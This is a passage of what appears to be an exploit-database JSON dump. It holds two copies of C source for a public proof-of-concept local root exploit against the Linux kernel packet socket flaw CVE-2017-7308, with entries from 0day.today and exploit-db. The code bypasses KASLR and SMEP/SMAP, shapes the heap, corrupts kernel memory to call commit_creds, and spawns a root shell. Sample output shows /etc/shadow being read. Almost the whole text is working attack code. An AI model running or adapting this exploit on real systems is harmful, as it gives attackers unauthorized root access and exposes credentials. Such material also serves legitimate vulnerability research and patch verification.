bind(s, (struct sockaddr *)&sa, sizeof(sa));\r\n\tif (rv < 0) {\r\n\t\tdprintf(\"[-] bind(AF_PACKET)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\treturn s;\r\n}\r\n\r\nvoid packet_socket_send(int s, char *buffer, int size) {\r\n\tstruct sockaddr_ll sa;\r\n\tmemset(&sa, 0, sizeof(sa));\r\n\tsa.sll_ifindex = if_nametoindex(\"lo\");\r\n\tsa.sll_halen = ETH_ALEN;\r\n\r\n\tif (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,\r\n\t\t\tsizeof(sa)) < 0) {\r\n\t\tdprintf(\"[-] sendto(SOCK_RAW)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nvoid loopback_send(char *buffer, int size) {\r\n\tint s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);\r\n\tif (s == -1) {\r\n\t\tdprintf(\"[-] socket(SOCK_RAW)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tpacket_socket_send(s, buffer, size);\r\n}\r\n\r\nint packet_sock_kmalloc() {\r\n\tint s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\r\n\tif (s == -1) {\r\n\t\tdprintf(\"[-] socket(SOCK_DGRAM)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\treturn s;\r\n}\r\n\r\nvoid packet_sock_timer_schedule(int s, int timeout) {\r\n\tpacket_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);\r\n}\r\n\r\nvoid packet_sock_id_match_trigger(int s) {\r\n\tchar buffer[16];\r\n\tpacket_socket_send(s, &buffer[0], sizeof(buffer));\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n\r\n#define ALIGN(x, a)\t\t\t__ALIGN_KERNEL((x), (a))\r\n#define __ALIGN_KERNEL(x, a)\t\t__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)\r\n#define __ALIGN_KERNEL_MASK(x, mask)\t(((x) + (mask)) & ~(mask))\r\n\r\n#define V3_ALIGNMENT\t(8)\r\n#define BLK_HDR_LEN\t(ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT))\r\n\r\n#define ETH_HDR_LEN\tsizeof(struct ethhdr)\r\n#define IP_HDR_LEN\tsizeof(struct iphdr)\r\n#define UDP_HDR_LEN\tsizeof(struct udphdr)\r\n\r\n#define UDP_HDR_LEN_FULL\t(ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN)\r\n\r\nint oob_setup(int offset) {\r\n\tunsigned int maclen = ETH_HDR_LEN;\r\n\tunsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +\r\n\t\t\t\t(maclen < 16 ? 16 : maclen));\r\n\tunsigned int macoff = netoff - maclen;\r\n\tunsigned int sizeof_priv = (1u<<31) + (1u<<30) +\r\n\t\t0x8000 - BLK_HDR_LEN - macoff + offset;\r\n\treturn packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);\r\n}\r\n\r\nvoid oob_write(char *buffer, int size) {\r\n\tloopback_send(buffer, size);\r\n}\r\n\r\nvoid oob_timer_execute(void *func, unsigned long arg) {\r\n\toob_setup(2048 + TIMER_OFFSET - 8);\r\n\r\n\tint i;\r\n\tfor (i = 0; i < 32; i++) {\r\n\t\tint timer = packet_sock_kmalloc();\r\n\t\tpacket_sock_timer_schedule(timer, 1000);\r\n\t}\r\n\r\n\tchar buffer[2048];\r\n\tmemset(&buffer[0], 0, sizeof(buffer));\r\n\r\n\tstruct timer_list *timer = (struct timer_list *)&buffer[8];\r\n\ttimer->function = func;\r\n\ttimer->data = arg;\r\n\ttimer->flags = 1;\r\n\r\n\toob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);\r\n\r\n\tsleep(1);\r\n}\r\n\r\nvoid oob_id_match_execute(void *func) {\r\n\tint s = oob_setup(2048 + XMIT_OFFSET - 64);\r\n\r\n\tint ps[32];\r\n\r\n\tint i;\r\n\tfor (i = 0; i < 32; i++)\r\n\t\tps[i] = packet_sock_kmalloc();\r\n\r\n\tchar buffer[2048];\r\n\tmemset(&buffer[0], 0, 2048);\r\n\r\n\tvoid **xmit = (void **)&buffer[64];\r\n\t*xmit = func;\r\n\r\n\toob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);\r\n\r\n\tfor (i = 0; i < 32; i++)\r\n\t\tpacket_sock_id_match_trigger(ps[i]);\r\n}\r\n\r\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\r\n\r\nvoid kmalloc_pad(int count) {\r\n\tint i;\r\n\tfor (i = 0; i < count; i++)\r\n\t\tpacket_sock_kmalloc();\r\n}\r\n\r\nvoid pagealloc_pad(int count) {\r\n\tpacket_socket_setup(0x8000, 2048, count, 0, 100);\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *\r\n\r\ntypedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n\r\nvoid get_root_payload(void) {\r\n\t((_commit_creds)(COMMIT_CREDS))(\r\n\t\t((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)\r\n\t);\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\r\n\r\n#define CHUNK_SIZE 1024\r\n\r\nint read_file(const char* file, char* buffer, int max_length) {\r\n\tint f = open(file, O_RDONLY);\r\n\tif (f == -1)\r\n\t\treturn -1;\r\n\tint bytes_read = 0;\r\n\twhile (true) {\r\n\t\tint bytes_to_read = CHUNK_SIZE;\r\n\t\tif (bytes_to_read > max_length - bytes_read)\r\n\t\t\tbytes_to_read = max_length - bytes_read;\r\n\t\tint rv = read(f, &buffer[bytes_read], bytes_to_read);\r\n\t\tif (rv == -1)\r\n\t\t\treturn -1;\r\n\t\tbytes_read += rv;\r\n\t\tif (rv == 0)\r\n\t\t\treturn bytes_read;\r\n\t}\r\n}\r\n\r\nvoid get_kernel_version(char* output, int max_length) {\r\n struct utsname u;\r\n int rv = uname(&u);\r\n if (rv != 0) {\r\n dprintf(\"[-] uname())\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n assert(strlen(u.release) <= max_length);\r\n strcpy(&output[0], u.release);\r\n}\r\n\r\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\r\n\r\n#define KERNEL_VERSION_LENGTH 32\r\n\r\nvoid detect_versions() {\r\n\tchar version[KERNEL_VERSION_LENGTH];\r\n\r\n\tget_kernel_version(&version[0], KERNEL_VERSION_LENGTH);\r\n\r\n\tint i;\r\n\tfor (i = 0; i < ARRAY_SIZE(kernels); i++) {\r\n\t\tif (strcmp(&version[0], kernels[i].version) == 0) {\r\n\t\t\tdprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].version);\r\n\t\t\tkernel = i;\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\r\n\tdprintf(\"[-] kernel version not recognized\\n\");\r\n\texit(EXIT_FAILURE);\r\n}\r\n\r\n#define PROC_CPUINFO_LENGTH 4096\r\n\r\n// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP\r\nint smap_smep_enabled() {\r\n\tchar buffer[PROC_CPUINFO_LENGTH];\r\n\tchar* path = \"/proc/cpuinfo\";\r\n\tint length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);\r\n\tif (length == -1) {\r\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint rv = 0;\r\n\tchar* found = memmem(&buffer[0], length, \"smep\", 4);\r\n\tif (found != NULL)\r\n\t\trv += 1;\r\n\tfound = memmem(&buffer[0], length, \"smap\", 4);\r\n\tif (found != NULL)\r\n\t\trv += 2;\r\n\treturn rv;\r\n}\r\n\r\nvoid check_smep_smap() {\r\n\tint rv = smap_smep_enabled();\r\n\r\n#if !ENABLE_SMEP_SMAP_BYPASS\r\n\tif (rv >= 1) {\r\n\t\tdprintf(\"[-] SMAP/SMEP detected, use ENABLE_SMEP_SMAP_BYPASS\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n#endif\r\n\r\n\tswitch(rv) {\r\n\tcase 1: // SMEP\r\n\t\tCR4_DESIRED_VALUE = 0x406e0ul;\r\n\t\tbreak;\r\n\tcase 2: // SMAP\r\n\t\tCR4_DESIRED_VALUE = 0x407f0ul;\r\n\t\tbreak;\r\n\tcase 3: // SMEP and SMAP\r\n\t\tCR4_DESIRED_VALUE = 0x407f0ul;\r\n\t\tbreak;\r\n\t}\r\n}\r\n\r\n// * * * * * * * * * * * * * Syslog KASLR bypass * * * * * * * * * * * * * * *\r\n\r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n\r\nunsigned long get_kernel_addr_syslog() {\r\n\tdprintf(\"[.] trying syslog...\\n\");\r\n\r\n\tint size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n\tif (size == -1) {\r\n\t\tdprintf(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tsize = (size / getpagesize() + 1) * getpagesize();\r\n\tchar *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,\r\n\t\tMAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\r\n\r\n\tsize = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);\r\n\tif (size == -1) {\r\n\t\tdprintf(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tconst char *needle1 = \"Freeing SMP\";\r\n\tchar *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n\tif (substr == NULL) {\r\n\t\tdprintf(\"[-] substring '%s' not found in dmesg\\n\", needle1);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tfor (size = 0; substr[size] != '\\n'; size++);\r\n\r\n\tconst char *needle2 = \"ffff\";\r\n\tsubstr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));\r\n\tif (substr == NULL) {\r\n\t\tdprintf(\"[-] substring '%s' not found in dmesg\\n\", needle2);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tchar *endptr = &substr[16];\r\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n\tr &= 0xfffffffffff00000ul;\r\n\tr -= 0x1000000ul;\r\n\r\n\treturn r;\r\n}\r\n\r\n// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_kallsyms() {\r\n\tFILE *f;\r\n\tunsigned long addr = 0;\r\n\tchar dummy;\r\n\tchar sname[256];\r\n\tchar* name = \"startup_64\";\r\n\tchar* path = \"/proc/kallsyms\";\r\n\r\n\tdprintf(\"[.] trying %s...\\n\", path);\r\n\tf = fopen(path, \"r\");\r\n\tif (f == NULL) {\r\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tint ret = 0;\r\n\twhile (ret != EOF) {\r\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, \"%s\\n\", sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\r\n\tfclose(f);\r\n\tdprintf(\"[-] kernel base not found in %s\\n\", path);\r\n\treturn 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_sysmap() {\r\n\tFILE *f;\r\n\tunsigned long addr = 0;\r\n\tchar path[512] = \"/boot/System.map-\";\r\n\tchar version[32];\r\n\tget_kernel_version(&version[0], 32);\r\n\tstrcat(path, &version[0]);\r\n\tdprintf(\"[.] trying %s...\\n\", path);\r\n\tf = fopen(path, \"r\");\r\n\tif (f == NULL) {\r\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tchar dummy;\r\n\tchar sname[256];\r\n\tchar* name = \"startup_64\";\r\n\tint ret = 0;\r\n\twhile (ret != EOF) {\r\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, \"%s\\n\", sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\r\n\tfclose(f);\r\n\tdprintf(\"[-] kernel base not found in %s\\n\", path);\r\n\treturn 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr() {\r\n\tunsigned long addr = 0;\r\n\r\n\taddr = get_kernel_addr_kallsyms();\r\n if (addr) return addr;\r\n\r\n\taddr = get_kernel_addr_sysmap();\r\n\tif (addr) return addr;\r\n\r\n\taddr = get_kernel_addr_syslog();\r\n\tif (addr) return addr;\r\n\r\n\tdprintf(\"[-] KASLR bypass failed\\n\");\r\n\texit(EXIT_FAILURE);\r\n\r\n\treturn 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n\r\nvoid check_procs() {\r\n\tint min_procs = 2;\r\n\r\n\tint nprocs = 0;\r\n\tnprocs = get_nprocs_conf();\r\n\r\n\tif (nprocs < min_procs) {\r\n\t\tdprintf(\"[-] system has less than %d processor cores\\n\", min_procs);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tdprintf(\"[.] system has %d processors\\n\", nprocs);\r\n}\r\n\r\nvoid exec_shell() {\r\n\tint fd;\r\n\r\n\tfd = open(\"/proc/1/ns/net\", O_RDONLY);\r\n\tif (fd == -1) {\r\n\t\tdprintf(\"error opening /proc/1/ns/net\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (setns(fd, CLONE_NEWNET) == -1) {\r\n\t\tdprintf(\"error calling setns\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tsystem(SHELL);\r\n}\r\n\r\nvoid fork_shell() {\r\n\tpid_t rv;\r\n\r\n\trv = fork();\r\n\tif (rv == -1) {\r\n\t\tdprintf(\"[-] fork()\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (rv == 0) {\r\n\t\texec_shell();\r\n\t}\r\n}\r\n\r\nbool is_root() {\r\n\t// We can't simple check uid, since we're running inside a namespace\r\n\t// with uid set to 0. Try opening /etc/shadow instead.\r\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid check_root() {\r\n\tdprintf(\"[.] checking if we got root\\n\");\r\n\r\n\tif (!is_root()) {\r\n\t\tdprintf(\"[-] something went wrong =(\\n\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tdprintf(\"[+] got r00t ^_^\\n\");\r\n\r\n\t// Fork and exec instead of just doing the exec to avoid potential\r\n\t// memory corruptions when closing packet sockets.\r\n\tfork_shell();\r\n}\r\n\r\nbool write_file(const char* file, const char* what, ...) {\r\n\tchar buf[1024];\r\n\tva_list args;\r\n\tva_start(args, what);\r\n\tvsnprintf(buf, sizeof(buf), what, args);\r\n\tva_end(args);\r\n\tbuf[sizeof(buf) - 1] = 0;\r\n\tint len = strlen(buf);\r\n\r\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tif (write(fd, buf, len) != len) {\r\n\t\tclose(fd);\r\n\t\treturn false;\r\n\t}\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid setup_sandbox() {\r\n\tint real_uid = getuid();\r\n\tint real_gid = getgid();\r\n\r\n if (unshare(CLONE_NEWUSER) != 0) {\r\n\t\tdprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n if (unshare(CLONE_NEWNET) != 0) {\r\n\t\tdprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\r\n\t\tdprintf(\"[-] write_file(/proc/self/set_groups)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)){\r\n\t\tdprintf(\"[-] write_file(/proc/self/uid_map)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\r\n\t\tdprintf(\"[-] write_file(/proc/self/gid_map)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tcpu_set_t my_set;\r\n\tCPU_ZERO(&my_set);\r\n\tCPU_SET(0, &my_set);\r\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\r\n\t\tdprintf(\"[-] sched_setaffinity()\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\r\n\t\tdprintf(\"[-] system(/sbin/ifconfig lo up)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n\tif (argc > 1) SHELL = argv[1];\r\n\r\n\tdprintf(\"[.] starting\\n\");\r\n\r\n\tcheck_procs();\r\n\r\n\tdprintf(\"[.] checking kernel version\\n\");\r\n\tdetect_versions();\r\n\tdprintf(\"[~] done, version looks good\\n\");\r\n\r\n\tdprintf(\"[.] checking SMEP and SMAP\\n\");\r\n\tcheck_smep_smap();\r\n\tdprintf(\"[~] done, looks good\\n\");\r\n\r\n\tdprintf(\"[.] setting up namespace sandbox\\n\");\r\n\tsetup_sandbox();\r\n\tdprintf(\"[~] done, namespace sandbox set up\\n\");\r\n\r\n#if ENABLE_KASLR_BYPASS\r\n\tdprintf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\r\n\tKERNEL_BASE = get_kernel_addr();\r\n\tdprintf(\"[.] done, kernel text: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n\r\n\tdprintf(\"[.] commit_creds: %lx\\n\", COMMIT_CREDS);\r\n\tdprintf(\"[.] prepare_kernel_cred: %lx\\n\", PREPARE_KERNEL_CRED);\r\n\r\n#if ENABLE_SMEP_SMAP_BYPASS\r\n\tdprintf(\"[.] native_write_cr4: %lx\\n\", NATIVE_WRITE_CR4);\r\n#endif\r\n\r\n\tdprintf(\"[.] padding heap\\n\");\r\n\tkmalloc_pad(KMALLOC_PAD);\r\n\tpagealloc_pad(PAGEALLOC_PAD);\r\n\tdprintf(\"[.] done, heap is padded\\n\");\r\n\r\n#if ENABLE_SMEP_SMAP_BYPASS\r\n\tdprintf(\"[.] SMEP & SMAP bypass enabled, turning them off\\n\");\r\n\toob_timer_execute((void *)(NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);\r\n\tdprintf(\"[.] done, SMEP & SMAP should be off now\\n\");\r\n#endif\r\n\r\n\tdprintf(\"[.] executing get root payload %p\\n\", &get_root_payload);\r\n\toob_id_match_execute((void *)&get_root_payload);\r\n\tdprintf(\"[.] done, should be root now\\n\");\r\n\r\n\tcheck_root();\r\n\r\n\twhile (1) sleep(1000);\r\n\r\n\treturn 0;\r\n}\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33035"}], "exploitdb": [{"lastseen": "2017-05-11T20:48:17", "description": "Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation. CVE-2017-7308. Local exploit for Linux platform. Tags: Local", "published": "2017-05-11T00:00:00", "type": "exploitdb", "title": "Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7308"], "modified": "2017-05-11T00:00:00", "id": "EDB-ID:41994", "href": "https://www.exploit-db.com/exploits/41994/", "sourceData": "// A proof-of-concept local root exploit for CVE-2017-7308.\r\n// Includes a SMEP & SMAP bypass.\r\n// Tested on 4.8.0-41-generic Ubuntu kernel.\r\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308\r\n//\r\n// Usage:\r\n// user@ubuntu:~$ uname -a\r\n// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...\r\n// user@ubuntu:~$ gcc pwn.c -o pwn\r\n// user@ubuntu:~$ ./pwn \r\n// [.] starting\r\n// [.] namespace sandbox set up\r\n// [.] KASLR bypass enabled, getting kernel addr\r\n// [.] done, kernel text: ffffffff87000000\r\n// [.] commit_creds: ffffffff870a5cf0\r\n// [.] prepare_kernel_cred: ffffffff870a60e0\r\n// [.] native_write_cr4: ffffffff87064210\r\n// [.] padding heap\r\n// [.] done, heap is padded\r\n// [.] SMEP & SMAP bypass enabled, turning them off\r\n// [.] done, SMEP & SMAP should be off now\r\n// [.] executing get root payload 0x401516\r\n// [.] done, should be root now\r\n// [.] checking if we got root\r\n// [+] got r00t ^_^\r\n// root@ubuntu:/home/user# cat /etc/shadow\r\n// root:!:17246:0:99999:7:::\r\n// daemon:*:17212:0:99999:7:::\r\n// bin:*:17212:0:99999:7:::\r\n// ...\r\n//\r\n// Andrey Konovalov <andreyknvl@gmail.com>\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <stdarg.h>\r\n#include <stdbool.h>\r\n#include <stddef.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <sched.h>\r\n\r\n#include <sys/ioctl.h>\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include <sys/socket.h>\r\n#include <sys/syscall.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#include <arpa/inet.h>\r\n#include <linux/if_packet.h>\r\n#include <linux/ip.h>\r\n#include <linux/udp.h>\r\n#include <netinet/if_ether.h>\r\n#include <net/if.h>\r\n\r\n#define ENABLE_KASLR_BYPASS\t1\r\n#define ENABLE_SMEP_SMAP_BYPASS\t1\r\n\r\n// Will be overwritten if ENABLE_KASLR_BYPASS\r\nunsigned long KERNEL_BASE = \t0xffffffff81000000ul;\r\n\r\n// Kernel symbol offsets\r\n#define COMMIT_CREDS\t\t0xa5cf0ul\r\n#define PREPARE_KERNEL_CRED\t0xa60e0ul\r\n#define NATIVE_WRITE_CR4\t0x64210ul\r\n\r\n// Should have SMEP and SMAP bits disabled\r\n#define CR4_DESIRED_VALUE\t0x407f0ul\r\n\r\n#define KMALLOC_PAD\t\t512\r\n#define PAGEALLOC_PAD\t\t1024\r\n\r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n\r\ntypedef uint32_t u32;\r\n\r\n// $ pahole -C hlist_node ./vmlinux\r\nstruct hlist_node {\r\n\tstruct hlist_node * next; /* 0 8 */\r\n\tstruct hlist_node * * pprev; /* 8 8 */\r\n};\r\n\r\n// $ pahole -C timer_list ./vmlinux\r\nstruct timer_list {\r\n\tstruct hlist_node entry; /* 0 16 */\r\n\tlong unsigned int expires; /* 16 8 */\r\n\tvoid (*function)(long unsigned int); /* 24 8 */\r\n\tlong unsigned int data; /* 32 8 */\r\n\tu32 flags; /* 40 4 */\r\n\tint start_pid; /* 44 4 */\r\n\tvoid * start_site; /* 48 8 */\r\n\tchar start_comm[16]; /* 56 16 */\r\n};\r\n\r\n// packet_sock->rx_ring->prb_bdqc->retire_blk_timer\r\n#define TIMER_OFFSET\t896\r\n\r\n// pakcet_sock->xmit\r\n#define XMIT_OFFSET\t1304\r\n\r\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\r\n\r\nvoid packet_socket_rx_ring_init(int s, unsigned int block_size,\r\n\t\tunsigned int frame_size, unsigned int block_nr,\r\n\t\tunsigned int sizeof_priv, unsigned int timeout) {\r\n\tint v = TPACKET_V3;\r\n\tint rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));\r\n\tif (rv < 0) {\r\n\t\tperror(\"[-] setsockopt(PACKET_VERSION)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tstruct tpacket_req3 req;\r\n\tmemset(&req, 0, sizeof(req));\r\n\treq.tp_block_size = block_size;\r\n\treq.tp_frame_size = frame_size;\r\n\treq.tp_block_nr = block_nr;\r\n\treq.tp_frame_nr = (block_size * block_nr) / frame_size;\r\n\treq.tp_retire_blk_tov = timeout;\r\n\treq.tp_sizeof_priv = sizeof_priv;\r\n\treq.tp_feature_req_word = 0;\r\n\r\n\trv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));\r\n\tif (rv < 0) {\r\n\t\tperror(\"[-] setsockopt(PACKET_RX_RING)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nint packet_socket_setup(unsigned int block_size, unsigned int frame_size,\r\n\t\tunsigned int block_nr, unsigned int sizeof_priv, int timeout) {\r\n\tint s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));\r\n\tif (s < 0) {\r\n\t\tperror(\"[-] socket(AF_PACKET)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tpacket_socket_rx_ring_init(s, block_size, frame_size, block_nr,\r\n\t\tsizeof_priv, timeout);\r\n\r\n\tstruct sockaddr_ll sa;\r\n\tmemset(&sa, 0, sizeof(sa));\r\n\tsa.sll_family = PF_PACKET;\r\n\tsa.sll_protocol = htons(ETH_P_ALL);\r\n\tsa.sll_ifindex = if_nametoindex(\"lo\");\r\n\tsa.sll_hatype = 0;\r\n\tsa.sll_pkttype = 0;\r\n\tsa.sll_halen = 0;\r\n\r\n\tint rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));\r\n\tif (rv < 0) {\r\n\t\tperror(\"[-] bind(AF_PACKET)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\treturn s;\r\n}\r\n\r\nvoid packet_socket_send(int s, char *buffer, int size) {\r\n\tstruct sockaddr_ll sa;\r\n\tmemset(&sa, 0, sizeof(sa));\r\n\tsa.sll_ifindex = if_nametoindex(\"lo\");\r\n\tsa.sll_halen = ETH_ALEN;\r\n\r\n\tif (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,\r\n\t\t\tsizeof(sa)) < 0) {\r\n\t\tperror(\"[-] sendto(SOCK_RAW)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nvoid loopback_send(char *buffer, int size) {\r\n\tint s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);\r\n\tif (s == -1) {\r\n\t\tperror(\"[-] socket(SOCK_RAW)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tpacket_socket_send(s, buffer, size);\r\n}\r\n\r\nint packet_sock_kmalloc() {\r\n\tint s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\r\n\tif (s == -1) {\r\n\t\tperror(\"[-] socket(SOCK_DGRAM)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\treturn s;\r\n}\r\n\r\nvoid packet_sock_timer_schedule(int s, int timeout) {\r\n\tpacket_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);\r\n}\r\n\r\nvoid packet_sock_id_match_trigger(int s) {\r\n\tchar buffer[16];\r\n\tpacket_socket_send(s, &buffer[0], sizeof(buffer));\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n\r\n#define ALIGN(x, a)\t\t\t__ALIGN_KERNEL((x), (a))\r\n#define __ALIGN_KERNEL(x, a)\t\t__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)\r\n#define __ALIGN_KERNEL_MASK(x, mask)\t(((x) + (mask)) & ~(mask))\r\n\r\n#define V3_ALIGNMENT\t(8)\r\n#define BLK_HDR_LEN\t(ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT))\r\n\r\n#define ETH_HDR_LEN\tsizeof(struct ethhdr)\r\n#define IP_HDR_LEN\tsizeof(struct iphdr)\r\n#define UDP_HDR_LEN\tsizeof(struct udphdr)\r\n\r\n#define UDP_HDR_LEN_FULL\t(ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN)\r\n\r\nint oob_setup(int offset) {\r\n\tunsigned int maclen = ETH_HDR_LEN;\r\n\tunsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +\r\n\t\t\t\t(maclen < 16 ? 16 : maclen));\r\n\tunsigned int macoff = netoff - maclen;\r\n\tunsigned int sizeof_priv = (1u<<31) + (1u<<30) +\r\n\t\t0x8000 - 